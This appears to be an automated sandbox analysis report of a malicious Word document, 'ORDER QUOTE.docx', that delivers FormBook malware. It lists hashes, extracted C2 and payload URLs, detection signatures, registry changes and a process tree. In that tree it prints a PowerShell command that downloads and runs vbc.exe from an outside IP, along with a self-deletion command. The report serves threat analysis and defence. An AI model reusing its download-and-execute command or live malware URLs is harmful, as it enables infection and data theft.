Analysis
- max time kernel: 150s
- max time network: 157s
- platform: windows7_x64
- resource: win7-en-20210920
- submitted: 22-09-2021 20:12
Static task: static1
Behavioral task: behavioral1
- Sample: ORDER QUOTE.docx
- Resource: win7-en-20210920
Behavioral task: behavioral2
- Sample: ORDER QUOTE.docx
- Resource: win10v20210408
General
- Target: ORDER QUOTE.docx
- Size: 10KB
- MD5: eee70c12ab889fd6173de81fbc9a6817
- SHA1: 673a841da220e5ba72e5f30d1d566569595ed352
- SHA256: 7c41d53d6dd4f2979bfcdea462feef025b2f31cf55644f927ece5f4699a1b7a9
- SHA512: 7647f0d5adcd468a6cbae4900ecb2887de0a0f89ba25893379f905f04b7b9ee0fa89af755c8cb1db8e4d613f11a8f9f80334de3e784677d1fac1ad51cc9db8d7
Malware Config
Extracted
- URL: http://198.46.199.161/joo/vbc.exe
Extracted
- Family: formbook
- Version: 4.1
- Campaign: m8g0
- C2: http://www.psicologarenatacruz.com/m8g0/
Signatures
-
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Formbook Payload 3 IoCs
Processes:
  resource | yara_rule
- behavioral1/memory/1732-88-0x0000000000400000-0x000000000042F000-memory.dmp | formbook
- behavioral1/memory/1732-89-0x000000000041F1B0-mapping.dmp | formbook
- behavioral1/memory/1032-98-0x00000000000C0000-0x00000000000EF000-memory.dmp | formbook
-
Blocklisted process makes network request 2 IoCs
Processes: EQNEDT32.EXE, powershell.exe
  flow | pid | process
- 11 | 572 | EQNEDT32.EXE
- 12 | 1748 | powershell.exe
-
Downloads MZ/PE file
-
Executes dropped EXE 3 IoCs
Processes: regasm.exe, vbc.exe, vbc.exe
  pid | process
- 1812 | regasm.exe
- 1472 | vbc.exe
- 1732 | vbc.exe
-
Abuses OpenXML format to download file from external location 2 IoCs
Processes: WINWORD.EXE
  description | ioc | process
- Key created | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE
- Key opened | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\Common\Offline\Files\http://cml.lol/olxqqy | WINWORD.EXE
-
Loads dropped DLL 4 IoCs
Processes: EQNEDT32.EXE, powershell.exe, vbc.exe
  pid | process
- 572 | EQNEDT32.EXE
- 572 | EQNEDT32.EXE
- 1592 | powershell.exe
- 1472 | vbc.exe
-
Uses the VBS compiler for execution 1 TTPs
-
Drops file in System32 directory 2 IoCs
Processes: powershell.exe, powershell.exe
  description | ioc | process
- File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
- File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
-
Suspicious use of SetThreadContext 4 IoCs
Processes: vbc.exe, vbc.exe, NETSTAT.EXE
  description | pid | process | target process
- PID 1472 set thread context of 1732 | 1472 | vbc.exe | vbc.exe
- PID 1732 set thread context of 1264 | 1732 | vbc.exe | Explorer.EXE
- PID 1732 set thread context of 1264 | 1732 | vbc.exe | Explorer.EXE
- PID 1032 set thread context of 1264 | 1032 | NETSTAT.EXE | Explorer.EXE
-
Drops file in Windows directory 1 IoCs
Processes: WINWORD.EXE
  description | ioc | process
- File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE
-
Office loads VBA resources, possible macro or embedded object present
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes: NETSTAT.EXE
  pid | process
- 1032 | NETSTAT.EXE
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Modifies Internet Explorer settings
Processes: WINWORD.EXE
  description | ioc | process
- Set value (int) | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE
- Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | WINWORD.EXE
- Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | WINWORD.EXE
- Set value (str) | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | WINWORD.EXE
- Set value (str) | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE
- Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | WINWORD.EXE
- Key created | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE
- Key created | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | WINWORD.EXE
- Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | WINWORD.EXE
- Key created | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE
- Set value (str) | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE
- Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | WINWORD.EXE
- Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | WINWORD.EXE
- Key created | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE
- Set value (int) | \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE
- Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | WINWORD.EXE
- Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | WINWORD.EXE
- Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | WINWORD.EXE
- Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | WINWORD.EXE
-
Modifies registry class 64 IoCs
Processes: WINWORD.EXE
  description | ioc | process
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\"" | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | WINWORD.EXE
- Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe" | WINWORD.EXE
- Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application\ = "Excel" | WINWORD.EXE
- Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command | WINWORD.EXE
- Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\DefaultIcon\ = "\"%1\"" | WINWORD.EXE
- Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | WINWORD.EXE
- Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32 | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe | WINWORD.EXE
- Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command | WINWORD.EXE
- Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | WINWORD.EXE
- Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command | WINWORD.EXE
- Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | WINWORD.EXE
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | WINWORD.EXE
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print" | WINWORD.EXE
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes: WINWORD.EXE
  pid | process
- 1104 | WINWORD.EXE
-
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes: powershell.exe, powershell.exe, vbc.exe, NETSTAT.EXE
  pid | process
- 1748 | powershell.exe
- 1592 | powershell.exe (3 entries)
- 1732 | vbc.exe (3 entries)
- 1032 | NETSTAT.EXE (13 entries)
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes: Explorer.EXE
  pid | process
- 1264 | Explorer.EXE
-
Suspicious behavior: MapViewOfSection 6 IoCs
Processes: vbc.exe, NETSTAT.EXE
  pid | process
- 1732 | vbc.exe (4 entries)
- 1032 | NETSTAT.EXE (2 entries)
-
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes: powershell.exe, powershell.exe, vbc.exe, NETSTAT.EXE, Explorer.EXE, WINWORD.EXE
  description | pid | process
- Token: SeDebugPrivilege | 1748 | powershell.exe
- Token: SeDebugPrivilege | 1592 | powershell.exe
- Token: SeDebugPrivilege | 1732 | vbc.exe
- Token: SeDebugPrivilege | 1032 | NETSTAT.EXE
- Token: SeShutdownPrivilege | 1264 | Explorer.EXE
- Token: SeShutdownPrivilege | 1104 | WINWORD.EXE
- Token: SeShutdownPrivilege | 1264 | Explorer.EXE (3 entries)
-
Suspicious use of FindShellTrayWindow 2 IoCs
Processes: Explorer.EXE
  pid | process
- 1264 | Explorer.EXE (2 entries)
-
Suspicious use of SendNotifyMessage 2 IoCs
Processes: Explorer.EXE
  pid | process
- 1264 | Explorer.EXE (2 entries)
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes: WINWORD.EXE
  pid | process
- 1104 | WINWORD.EXE (2 entries)
-
Suspicious use of WriteProcessMemory 39 IoCs
Processes: EQNEDT32.EXE, WINWORD.EXE, regasm.exe, cmd.exe, powershell.exe, vbc.exe, vbc.exe, NETSTAT.EXE
  description | pid | process | target process
- PID 572 wrote to memory of 1812 | 572 | EQNEDT32.EXE | regasm.exe (4 entries)
- PID 1104 wrote to memory of 1180 | 1104 | WINWORD.EXE | splwow64.exe (4 entries)
- PID 1812 wrote to memory of 376 | 1812 | regasm.exe | cmd.exe (4 entries)
- PID 376 wrote to memory of 1748 | 376 | cmd.exe | powershell.exe (4 entries)
- PID 376 wrote to memory of 1592 | 376 | cmd.exe | powershell.exe (4 entries)
- PID 1592 wrote to memory of 1472 | 1592 | powershell.exe | vbc.exe (4 entries)
- PID 1472 wrote to memory of 1732 | 1472 | vbc.exe | vbc.exe (7 entries)
- PID 1732 wrote to memory of 1032 | 1732 | vbc.exe | NETSTAT.EXE (4 entries)
- PID 1032 wrote to memory of 1120 | 1032 | NETSTAT.EXE | cmd.exe (4 entries)
Processes
- C:\Windows\Explorer.EXE
  Command line: C:\Windows\Explorer.EXE
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ORDER QUOTE.docx"
    - Abuses OpenXML format to download file from external location
    - Drops file in Windows directory
    - Modifies Internet Explorer settings
    - Modifies registry class
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - C:\Windows\splwow64.exe
      Command line: C:\Windows\splwow64.exe 12288
- C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
  Command line: "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
  - Blocklisted process makes network request
  - Loads dropped DLL
  - Launches Equation Editor
  - Suspicious use of WriteProcessMemory
  - C:\Users\Public\regasm.exe
    Command line: "C:\Users\Public\regasm.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\cmd.exe
      Command line: cmd /c powershell "(New-Object System.Net.WebClient).DownloadFile('http://198.46.199.161/joo/vbc.exe', (Join-Path -Path $env:Temp -ChildPath 'vbc.exe'))" & powershell "Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'vbc.exe')" & exit
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell "(New-Object System.Net.WebClient).DownloadFile('http://198.46.199.161/joo/vbc.exe', (Join-Path -Path $env:Temp -ChildPath 'vbc.exe'))"
        - Blocklisted process makes network request
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: powershell "Start-Process -FilePath (Join-Path -Path $env:Temp -ChildPath 'vbc.exe')"
        - Loads dropped DLL
        - Drops file in System32 directory
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory
        - C:\Users\Admin\AppData\Local\Temp\vbc.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\vbc.exe"
          - Executes dropped EXE
          - Loads dropped DLL
          - Suspicious use of SetThreadContext
          - Suspicious use of WriteProcessMemory
          - C:\Users\Admin\AppData\Local\Temp\vbc.exe
            Command line: "C:\Users\Admin\AppData\Local\Temp\vbc.exe"
            - Executes dropped EXE
            - Suspicious use of SetThreadContext
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious behavior: MapViewOfSection
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            - C:\Windows\SysWOW64\NETSTAT.EXE
              Command line: "C:\Windows\SysWOW64\NETSTAT.EXE"
              - Suspicious use of SetThreadContext
              - Gathers network information
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious behavior: MapViewOfSection
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious use of WriteProcessMemory
              - C:\Windows\SysWOW64\cmd.exe
                Command line: /c del "C:\Users\Admin\AppData\Local\Temp\vbc.exe"
Downloads
- C:\Users\Admin\AppData\Local\Temp\vbc.exe
  MD5: 3dac10541270990e15c8742b0cd6f153
  SHA1: ed5c87e500c51e055ddb9160929a3dac51d3a393
  SHA256: 744e1148859c05acf0cb4aac84f5687c5106268c30db72a31529b67695028a5f
  SHA512: 66f408fefd562558c96749981784157ac480895867e6612a410f8ebad6af05547e0fdae4431f1ddb136d2086d7acf2927ccff0d60b1adc44144c8bf1507589d1
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
  MD5: 98452948bf0ef2e253e6a7fb03276fd5
  SHA1: 89aa6864d4bb558f036b24c74d870517701ec3f3
  SHA256: 151135496a0c66040eeb12bc2c5489c87221094ab17da5a981c574686a524c7d
  SHA512: 661eda145d7d0f1a3fa44cc4ea9a09d8eba39f1e3a3cc42cb60ead043b2ac60077070b95db36ce599966d1f6a9906294d5330abad6b9c0e9520c2459e68fe26f
- C:\Users\Public\regasm.exe
  MD5: 7f06feab552ff5b4b5ea9c0c08a50982
  SHA1: fec42fd952353328a01939c949ccb7031be50530
  SHA256: 053e45fb6090b18e9a8ff0a8c24fd2d77eca4057539b1add95e03c38be35b3a0
  SHA512: 9c5877c7851e8d6b000c729948b330ab66e69a18205b3ac5de70b4907360f3fb4541e6745312f7deb08f1a046fb2470e13ab9ca326e0e2f478819ecaa47e9be0
- memory/376-65-0x0000000000000000-mapping.dmp
- memory/1032-98-0x00000000000C0000-0x00000000000EF000-memory.dmp, Filesize: 188KB
- memory/1032-97-0x00000000009F0000-0x00000000009F9000-memory.dmp, Filesize: 36KB
- memory/1032-101-0x0000000001F50000-0x0000000001FE4000-memory.dmp, Filesize: 592KB
- memory/1032-100-0x0000000002220000-0x0000000002523000-memory.dmp, Filesize: 3.0MB
- memory/1032-96-0x0000000000000000-mapping.dmp
- memory/1104-54-0x0000000072A31000-0x0000000072A34000-memory.dmp, Filesize: 12KB
- memory/1104-102-0x000000005FFF0000-0x0000000060000000-memory.dmp, Filesize: 64KB
- memory/1104-57-0x0000000075821000-0x0000000075823000-memory.dmp, Filesize: 8KB
- memory/1104-56-0x000000005FFF0000-0x0000000060000000-memory.dmp, Filesize: 64KB
- memory/1104-55-0x00000000704B1000-0x00000000704B3000-memory.dmp, Filesize: 8KB
- memory/1120-99-0x0000000000000000-mapping.dmp
- memory/1180-64-0x000007FEFBE61000-0x000007FEFBE63000-memory.dmp, Filesize: 8KB
- memory/1180-63-0x0000000000000000-mapping.dmp
- memory/1264-93-0x0000000006E20000-0x0000000006FC8000-memory.dmp, Filesize: 1.7MB
- memory/1264-95-0x0000000007540000-0x00000000076D9000-memory.dmp, Filesize: 1.6MB
- memory/1264-103-0x00000000080B0000-0x0000000008230000-memory.dmp, Filesize: 1.5MB
- memory/1472-85-0x00000000048E0000-0x0000000004941000-memory.dmp, Filesize: 388KB
- memory/1472-84-0x0000000004E30000-0x0000000004E31000-memory.dmp, Filesize: 4KB
- memory/1472-86-0x0000000001350000-0x0000000001382000-memory.dmp, Filesize: 200KB
- memory/1472-83-0x0000000000C80000-0x0000000000C9D000-memory.dmp, Filesize: 116KB
